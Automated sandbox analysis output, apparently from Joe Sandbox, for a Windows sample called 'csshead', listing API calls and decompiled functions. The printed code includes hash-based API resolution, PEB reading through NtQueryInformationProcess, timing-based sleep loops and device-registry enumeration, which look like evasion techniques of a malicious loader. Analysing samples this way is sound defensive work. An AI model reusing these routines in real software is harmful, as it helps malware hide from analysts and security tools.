18771->18773 18774 4042ba FreeSid 18772->18774 18777 404288 18772->18777 18783 401440 GetProcessHeap HeapFree 18773->18783 18774->18773 18776 404293 EqualSid 18776->18777 18778 4042ac 18776->18778 18777->18774 18777->18776 18778->18774 18779->18750 18780->18758 18781->18755 18782->18771 18783->18767 19541 45500e 19542 455030 VirtualProtect VirtualProtect 19541->19542 19544 4551c3 19542->19544 19544->19544 19529 4091ac 19535 406dc8 GetTickCount Sleep 19529->19535 19537 406db0 19529->19537 19530 4091ae 19531 4069bc 10 API calls 19530->19531 19532 4091e8 19531->19532 19536 406de8 19535->19536 19536->19530 19538 406dbe GetTickCount Sleep 19537->19538 19540 406de8 19538->19540 19540->19530

    Executed Functions

    Function 00419D20, Relevance: 174.0, APIs: 89, Strings: 9, Instructions: 2465windowcomlibrary

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 419d20-419f20 CoInitialize NtdllDefWindowProc_A call 418480 GetCommandLineA CreateMenu LoadMenuA LoadBitmapA AppendMenuA LoadMenuA BeginDeferWindowPos 7 419f22-419f33 CreateMetaFileA 0->7 7->7 8 419f35-419f83 SetBrushOrgEx LoadImageA call 423911 7->8 11 41dbde-41dc07 call 423189 call 423991 8->11 12 419f89-41a33e FtpPutFileEx GetSysColorBrush FrameRect call 422158 GlobalAlloc GetLastError GetIconInfo * 2 GetDIBits * 2 call 42240e * 2 call 422840 * 2 GetDIBits * 2 8->12 35 41a343-41a39b GetDlgItem SetWindowContextHelpId 12->35 35->35 36 41a39d-41a949 call 422840 mmioSetInfo mmioAscend GetSystemInfo GetSystemTimeAsFileTime SetConsoleCtrlHandler CreateIoCompletionPort CopyImage 35->36 52 41a950-41a981 call 421dde 36->52 55 41a983-41c8f6 call 432952 DrawMenuBar FindResourceA VirtualAlloc call 432cd2 call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect call 42240e * 4 call 432d0e * 2 call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 421dd8 call 422a18 call 421dd8 call 42240e * 4 call 432d0e * 2 LoadLibraryA LoadIconA OleCreatePictureIndirect call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 call 422840 call 421dd8 call 422a18 call 421dd8 * 2 call 422a18 call 421dd8 call 422840 call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 422840 call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect LoadLibraryA LoadIconA OleCreatePictureIndirect call 42240e * 4 call 432d0e * 2 call 422840 call 421dd8 call 422a18 call 421dd8 call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect LoadLibraryA LoadIconA OleCreatePictureIndirect call 421dd8 call 422a18 call 421dd8 call 422840 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 42240e * 4 call 432d0e * 2 call 42240e * 4 call 432d0e * 2 call 422840 call 42240e * 4 call 432d0e * 2 call 422840 call 421dd8 call 422a18 call 421dd8 call 422840 call 421dd8 call 422a18 call 421dd8 call 42240e * 4 call 432d0e * 2 LoadLibraryA LoadIconA OleCreatePictureIndirect call 421dd8 call 422a18 call 421dd8 call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 422840 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 42240e * 4 call 432d0e * 2 call 42240e * 4 call 432d0e * 2 call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect call 421dd8 call 422a18 call 421dd8 call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect call 422840 call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect 52->55 507 41c8fa-41c959 55->507 507->11
    APIs
    • CoInitialize.OLE32(00000000), ref: 00419D2C
    • NtdllDefWindowProc_A.NTDLL(00000000,00000000,00000000,00000000), ref: 00419D3A
      • Part of subcall function 00418480: RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041848C
      • Part of subcall function 00418480: RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 0041849D
      • Part of subcall function 00418480: RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 004184A9
      • Part of subcall function 00418480: GetClassInfoExA.USER32(00442B90,AtlAxWin100,?), ref: 004184D0
      • Part of subcall function 00418480: LoadCursorA.USER32 ref: 0041850E
      • Part of subcall function 00418480: RegisterClassExA.USER32 ref: 00418531
      • Part of subcall function 00418480: GetClassInfoExA.USER32(00442B90,AtlAxWinLic100,?), ref: 0041857A
      • Part of subcall function 00418480: LoadCursorA.USER32 ref: 004185B2
      • Part of subcall function 00418480: RegisterClassExA.USER32 ref: 004185D5
      • Part of subcall function 00418480: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00418604
    • GetCommandLineA.KERNEL32 ref: 00419DA4
    • CreateMenu.USER32 ref: 00419EAE
    • LoadMenuA.USER32(?,Menu), ref: 00419EC9
    • LoadBitmapA.USER32(?,Bitmap), ref: 00419EDC
    • AppendMenuA.USER32(00000000,00000014,?,00000000), ref: 00419EEC
    • LoadMenuA.USER32(?,Edit), ref: 00419EFF
    • BeginDeferWindowPos.USER32(00442A98), ref: 00419F07
    • CreateMetaFileA.GDI32(?), ref: 00419F2B
    • SetBrushOrgEx.GDI32(00000000,00000001,00000000,00000000), ref: 00419F3A
    • LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 00419F6A
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    • FtpPutFileEx.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A00D
    • GetSysColorBrush.USER32(0000000F), ref: 0041A084
    • FrameRect.USER32(00000000,?,00000000), ref: 0041A094
    • GlobalAlloc.KERNEL32(00001000,00000838), ref: 0041A0C0
    • GetLastError.KERNEL32 ref: 0041A101
    • GetIconInfo.USER32(00000000,?), ref: 0041A12D
    • GetIconInfo.USER32(00000000,?), ref: 0041A14D
    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0041A22B
    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0041A244
    • GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 0041A2EB
    • GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 0041A309
    • GetDlgItem.USER32(00000000,00442A98), ref: 0041A390
    • SetWindowContextHelpId.USER32(00000000), ref: 0041A393
    • mmioSetInfo.WINMM(0000002F,?,0000002F), ref: 0041A422
    • mmioAscend.WINMM(0000002F,?,0000002F), ref: 0041A457
    • GetSystemInfo.KERNELBASE(?), ref: 0041A47E
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0041A4E5
    • SetConsoleCtrlHandler.KERNEL32(00442AA0,00000001), ref: 0041A4F3
    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0041A572
    • CopyImage.USER32(?,00000000,?,00442AA4,00000008), ref: 0041A93E
    • DrawMenuBar.USER32(00000061), ref: 0041AA1D
    • FindResourceA.KERNEL32(00000061,?,WAV), ref: 0041AA31
    • VirtualAlloc.KERNELBASE(00000000,00342AA0,00003000,00000022), ref: 0041AA4F
    • LoadLibraryA.KERNELBASE(open), ref: 0041AAAF
    • LoadIconA.USER32(00000000,00000064), ref: 0041AABA
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AAE1
    • LoadLibraryA.KERNELBASE(open,?,00000001,?), ref: 0041AB71
    • LoadIconA.USER32(00000000,00000064), ref: 0041AB76
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041ABA3
    • LoadLibraryA.KERNELBASE(open,?,?,?,?,00000001,?), ref: 0041AC29
    • LoadIconA.USER32(00000000,00000064), ref: 0041AC2E
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AC55
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • LoadLibraryA.KERNELBASE(open,00000002,00000000), ref: 0041AE48
    • LoadIconA.USER32(00000000,00000064), ref: 0041AE4D
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AE74
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,00000000,?,?,?,00000003,?,00000001,00000001,00000003,?,?), ref: 0041AF4B
    • LoadIconA.USER32(00000000,00000064), ref: 0041AF56
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AF7D
    • LoadLibraryA.KERNELBASE(open,?,00000001,00000001,00000003), ref: 0041B0C5
    • LoadIconA.USER32(00000000,00000064), ref: 0041B0CA
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041B0F1
    • LoadLibraryA.KERNELBASE(open,00000002,00000000), ref: 0041B4E7
    • LoadIconA.USER32(00000000,00000064), ref: 0041B4F0
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041B51A
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,?,?,?,00000003,00000001,00000000), ref: 0041B6B1
    • LoadIconA.USER32(00000000,00000064), ref: 0041B6BC
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041B6E9
    • LoadLibraryA.KERNELBASE(open), ref: 0041B72C
    • LoadIconA.USER32(00000000,00000064), ref: 0041B731
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041B758
    • LoadLibraryA.KERNELBASE(open,00000000,?,?,?,00000001,00000001,00000003,?,?,?,?,?,00000001,?), ref: 0041B90F
    • LoadIconA.USER32(00000000,00000064), ref: 0041B914
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041B93B
    • LoadLibraryA.KERNELBASE(open), ref: 0041B9DE
    • LoadIconA.USER32(00000000,00000064), ref: 0041B9E3
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041BA0E
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,00000000,?,?,?,?,?,?), ref: 0041BB90
    • LoadIconA.USER32(00000000,00000064), ref: 0041BB95
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041BBC0
    • LoadLibraryA.KERNELBASE(open,?,00000001,00000001,00000003), ref: 0041C08A
    • LoadIconA.USER32(00000000,00000064), ref: 0041C08F
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041C0BA
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,?,?,?,00000003,00000000,?,?,?,00000003,00000000,00000000), ref: 0041C2AB
    • LoadIconA.USER32(00000000,00000064), ref: 0041C2B6
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C2DD
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,00000000,?,?,?), ref: 0041C3B6
    • LoadIconA.USER32(00000000,00000064), ref: 0041C3BB
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C3E2
    • LoadLibraryA.KERNELBASE(open,00000001,00000001,00000003,?,00000001,00000001,00000003,?,?,?,00000001,?), ref: 0041C5C1
    • LoadIconA.USER32(00000000,00000064), ref: 0041C5C6
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C5F1
    • LoadLibraryA.KERNELBASE(open,?,?,?,?,?,?,?,?,?,00000001,?,?,?,?,00000001), ref: 0041C6E7
    • LoadIconA.USER32(00000000,00000064), ref: 0041C6EC
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C717
    • LoadLibraryA.KERNELBASE(open,00000002,00000000), ref: 0041C8B9
    • LoadIconA.USER32(00000000,00000064), ref: 0041C8BE
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C8E9
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041C95B, Relevance: 151.8, APIs: 62, Strings: 24, Instructions: 1340windowcomstring
    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,00000000,?,?,?,00000001,00000001,00000003,00000000,?,?,?), ref: 0041CAE5
    • LoadIconA.USER32(00000000,00000064), ref: 0041CAF0
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041CB1D
    • LoadLibraryA.KERNELBASE(open), ref: 0041CB7D
    • LoadIconA.USER32(00000000,00000064), ref: 0041CB82
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041CBA9
    • CreateEventA.KERNEL32(00000058,00000058,00000058,Xstore), ref: 0041CD17
    • GetClassLongA.USER32(00000058,000000E6), ref: 0041CD4A
    • SetClassLongA.USER32(00442AA8,000000E6,00000000), ref: 0041CD5F
    • GetCursorPos.USER32(0000000A), ref: 0041CD6A
    • GetCursorPos.USER32(?), ref: 0041CD89
    • WaitForSingleObject.KERNEL32(?,00000BB7,00000000), ref: 0041CFB9
    • WaitNamedPipeA.KERNEL32(\\.\pipe\pipe,000000FF), ref: 0041D097
    • CreateFileA.KERNELBASE(\\.\pipe\pipe,C0000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0B7
    • SetNamedPipeHandleState.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0D3
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0E4
    • WriteFile.KERNELBASE(00000000,00433E5C,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D101
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D108
    • ReadFile.KERNELBASE(00000000,?,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D11C
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D123
    • LookupAccountNameA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0041D16A
    • GetLastError.KERNEL32 ref: 0041D172
    • GetLastError.KERNEL32 ref: 0041D17B
    • GetLastError.KERNEL32 ref: 0041D190
    • LocalAlloc.KERNEL32(00000040,?), ref: 0041D1A8
    • GetLastError.KERNEL32 ref: 0041D1B0
    • LocalAlloc.KERNEL32(00000040,?), ref: 0041D1C7
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041D1CF
    • LookupAccountNameA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0041D1FB
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041D201
      • Part of subcall function 004242F0: __woutput_l.LIBCMT ref: 00424356
      • Part of subcall function 004242F0: __ftbuf.LIBCMT ref: 00424367
    • LocalFree.KERNEL32(00000000), ref: 0041D216
    • SetStretchBltMode.GDI32(00000000,00000004), ref: 0041D2F8
    • SetAbortProc.GDI32(00000000,004047A0), ref: 0041D323
    • DrawFrameControl.USER32(?,?,00000004,00004210), ref: 0041D34C
    • LoadImageA.USER32(?,?,00000000,00000000,00000000,00000000), ref: 0041D3B1
    • SetWindowLongA.USER32(00000000,000000EC,00000080), ref: 0041D3DF
      • Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EC), ref: 00417F10
      • Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EC), ref: 00417F23
      • Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
      • Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
      • Part of subcall function 00417E60: OleUninitialize.OLE32 ref: 00417F51
      • Part of subcall function 00417E60: OleInitialize.OLE32(00000000), ref: 00417F5E
      • Part of subcall function 00417E60: GetWindowTextLengthA.USER32(?), ref: 00417F68
      • Part of subcall function 00417E60: GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
      • Part of subcall function 00417E60: SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
      • Part of subcall function 00417E60: GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
      • Part of subcall function 00417E60: GlobalFix.KERNEL32(00000000), ref: 00417FF7
      • Part of subcall function 00417E60: GlobalUnWire.KERNEL32(00000000), ref: 00418012
      • Part of subcall function 00417E60: lstrlen.KERNEL32(00000000), ref: 00418031
      • Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
      • Part of subcall function 00417E60: NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176
    • CreateEventA.KERNEL32(00000000,00000000,00000000,denfers), ref: 0041D577
    • GetCursorPos.USER32(00000005), ref: 0041D586
    • GetCursorPos.USER32(?), ref: 0041D5B8
    • DragQueryFile.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
    • CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
    • WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
    • EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
    • GetDlgItem.USER32(00000000,00442A98), ref: 0041D91F
    • OleInitialize.OLE32(00000000), ref: 0041D929
    • RegisterDragDrop.OLE32(00000000,00442AA0), ref: 0041D93E
    • GetTopWindow.USER32(00000000), ref: 0041D946
    • RevokeDragDrop.OLE32(00000000), ref: 0041D94D
    • OleUninitialize.OLE32 ref: 0041D96B
    • SetMenuItemInfoA.USER32 ref: 0041D9B2
    • GetLastError.KERNEL32 ref: 0041D9BC
    • DrawMenuBar.USER32(00000000), ref: 0041D9C5
    • GetMenuItemInfoA.USER32 ref: 0041D9FA
    • BeginPaint.USER32(00442AA8,?), ref: 0041DA0F
    • EndPaint.USER32(00442AA8,?), ref: 0041DA1E
    • GetClientRect.USER32 ref: 0041DA38
    • EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
    • lstrcmpi.KERNEL32(?,UnregServer), ref: 0041DA86
    • lstrcmpi.KERNEL32(?,RegServer), ref: 0041DA92
    • lstrcmpi.KERNEL32(?,Automation), ref: 0041DA9E
    • lstrcmpi.KERNEL32(?,Embedding), ref: 0041DAAA
      • Part of subcall function 004198E0: RtlEnterCriticalSection.NTDLL ref: 0041991C
      • Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
      • Part of subcall function 004198E0: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
      • Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
      • Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA
    • Sleep.KERNEL32(00442B20,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBB9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00406EEC, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 131library

    Control-flow Graph

    C-Code - Quality: 100%
    			E00406EEC(void* __ecx) {
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				CHAR* _v28;
				void* _v32;
				void* _v161;
				void* _v192;
				intOrPtr _t54;
				struct HINSTANCE__* _t57;

				_v8 = 0;
				_t54 =  *0x40a55c; // 0x406ed0
				_v28 = E00403F38(_t54);
				_t57 = LoadLibraryA(_v28); // executed
				_v12 = _t57;
				E00401440(_v28);
				if (_v12 == 0) goto L7;
			}














    0x00406ef7
    0x00406efa
    0x00406f04
    0x00406f0b
    0x00406f11
    0x00406f17
    0x00406f20

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 00406F0B
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • SetupDiGetClassDevsA.SETUPAPI(0040A014,00000000,00000000,00000002), ref: 00406F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00406FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00406FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00406FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00406FF1
    • SetupDiGetClassDevsA.SETUPAPI(0040A024,00000000,00000000,00000002), ref: 00407028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00407056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0040707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00407096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004070A0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00404E94, Relevance: 3.0, APIs: 2, Instructions: 37native
    C-Code - Quality: 100%
    			E00404E94(void* __eax) {
				void* _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				void* _v24;
				void _v28;
				intOrPtr _v48;
				void _v52;

				_v8 = __eax;
				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18,  &_v20);
				if(_v16 == 0 && _v48 != 0) {
					_v24 = _v48 + 8;
					ReadProcessMemory(_v8, _v24,  &_v28, 4,  &_v20); // executed
					_v12 = _v28;
				}
				return _v12;
			}











    0x00404e9a
    0x00404eb3
    0x00404eba
    0x00404ec8
    0x00404edd
    0x00404ee6
    0x00404ee6
    0x00404eef

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00404EAD
    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 00404EDD
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0042CA48, Relevance: 1.5, APIs: 1, Instructions: 4
    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_0001CA06), ref: 0042CA4D
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00409178, Relevance: .0, Instructions: 22
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00409147, Relevance: .0, Instructions: 21
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00402574, Relevance: 57.1, APIs: 14, Strings: 18, Instructions: 1068library

    Control-flow Graph

    C-Code - Quality: 100%
    			E00402574(intOrPtr __eax) {
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				CHAR* _t492;
				CHAR* _t500;
				struct HINSTANCE__* _t564;
				CHAR* _t567;
				struct HINSTANCE__* _t568;
				CHAR* _t571;
				CHAR* _t587;
				CHAR* _t669;
				CHAR* _t677;
				CHAR* _t685;
				CHAR* _t693;
				CHAR* _t699;
				struct HINSTANCE__* _t700;
				CHAR* _t707;
				struct HINSTANCE__* _t708;
				intOrPtr _t712;
				CHAR* _t713;
				CHAR* _t755;

				_v8 = __eax;
				_v12 = E004024F8();
				 *0x40b11c = E00401994(_v12, 0xc8ac8026);
				 *0x40b120 = E00401994(_v12, 0x4b935b8e);
				 *0x40b1d0 = E00401994(_v12, 0x78b00c7e);
				 *0x40b144 = E00401994(_v12, 0x25447ac6);
				 *0x40b148 = E00401994(_v12, 0xf50b872);
				 *0x40b160 = E00401994(_v12, 0x9e6fa842);
				 *0x40b1bc = E00401994(_v12, 0x7d544dbd);
				 *0x40b124 = E00401994(_v12, 0x1fc0eaee);
				 *0x40b384 = E00401994(_v12, 0x270118e2);
				 *0x40b498 = E00401994(_v12, 0x4ae7572b);
				 *0x40b138 = E00401994(_v12, 0x81f0f0c9);
				 *0x40b140 = E00401994(_v12, 0x95fb6a02);
				 *0x40b334 = E00401994(_v12, 0x70f6fe31);
				 *0x40b338 = E00401994(_v12, 0x399354ce);
				 *0x40b128 = E00401994(_v12, 0xa45b370a);
				 *0x40b208 = E00401994(_v12, 0x2b00b870);
				 *0x40b1c4 = E00401994(_v12, 0x4fba916c);
				 *0x40b2a4 = E00401994(_v12, 0xc54374f3);
				 *0x40b2a0 = E00401994(_v12, 0x9c700049);
				 *0x40b29c = E00401994(_v12, 0x4f6ca717);
				 *0x40b2d8 = E00401994(_v12, 0x67ecde97);
				 *0x40b2dc = E00401994(_v12, 0xfdc94385);
				 *0x40b2e0 = E00401994(_v12, 0x68807354);
				 *0x40b2e4 = E00401994(_v12, 0x84d25ea);
				 *0x40b2e8 = E00401994(_v12, 0xfc7a6efd);
				 *0x40b2ec = E00401994(_v12, 0x5550b067);
				 *0x40b2f0 = E00401994(_v12, 0xaebea6a);
				 *0x40b12c = E00401994(_v12, 0x46318ac7);
				 *0x40b130 = E00401994(_v12, 0x49a1374a);
				 *0x40b134 = E00401994(_v12, 0xae17c571);
				 *0x40b150 = E00401994(_v12, 0xe61874b3);
				 *0x40b154 = E00401994(_v12, 0x3a7a7478);
				 *0x40b158 = E00401994(_v12, 0x533d3b41);
				 *0x40b15c = E00401994(_v12, 0x99a4299d);
				 *0x40b164 = E00401994(_v12, 0xbea0bf35);
				 *0x40b168 = E00401994(_v12, 0x9d00a761);
				 *0x40b188 = E00401994(_v12, 0x9abfb8a6);
				 *0x40b194 = E00401994(_v12, 0x6b416786);
				 *0x40b198 = E00401994(_v12, 0x774393e8);
				 *0x40b19c = E00401994(_v12, 0x2ee4f10d);
				 *0x40b1a0 = E00401994(_v12, 0x19f78c90);
				 *0x40b1a4 = E00401994(_v12, 0xd89ad05);
				 *0x40b1a8 = E00401994(_v12, 0xc930ea1e);
				 *0x40b18c = E00401994(_v12, 0x5bc1d14f);
				 *0x40b1e0 = E00401994(_v12, 0x77cd9567);
				 *0x40b1f0 = E00401994(_v12, 0x32432444);
				 *0x40b1f4 = E00401994(_v12, 0x279dead7);
				 *0x40b1f8 = E00401994(_v12, 0x7b4842c1);
				 *0x40b1fc = E00401994(_v12, 0xae52c609);
				 *0x40b200 = E00401994(_v12, 0xbf78969c);
				 *0x40b204 = E00401994(_v12, 0xbb74a4a2);
				 *0x40b22c = E00401994(_v12, 0x464871f3);
				 *0x40b190 = E00401994(_v12, 0x9bd6888f);
				 *0x40b20c = E00401994(_v12, 0x5c17ec75);
				 *0x40b210 = E00401994(_v12, 0x58fe7abe);
				 *0x40b254 = E00401994(_v12, 0x768aa260);
				 *0x40b25c = E00401994(_v12, 0xef0a25b7);
				 *0x40b260 = E00401994(_v12, 0xbc262395);
				 *0x40b264 = E00401994(_v12, 0xe8bf6dad);
				 *0x40b268 = E00401994(_v12, 0x5cd9430);
				 *0x40b26c = E00401994(_v12, 0xaef7cbf1);
				 *0x40b274 = E00401994(_v12, 0x475587b7);
				 *0x40b278 = E00401994(_v12, 0x3def91ba);
				 *0x40b408 = E00401994(_v12, 0xda81bc58);
				 *0x40b40c = E00401994(_v12, 0xf3b84f05);
				 *0x40b410 = E00401994(_v12, 0x392b6027);
				 *0x40b414 = E00401994(_v12, 0x7b2d2505);
				 *0x40b314 = E00401994(_v12, 0xeeba5eba);
				 *0x40b2a8 = E00401994(_v12, 0x89b968d2);
				 *0x40b2c0 = E00401994(_v12, 0x7e92ca65);
				 *0x40b2f4 = E00401994(_v12, 0x4c1077d6);
				 *0x40b31c = E00401994(_v12, 0x84033deb);
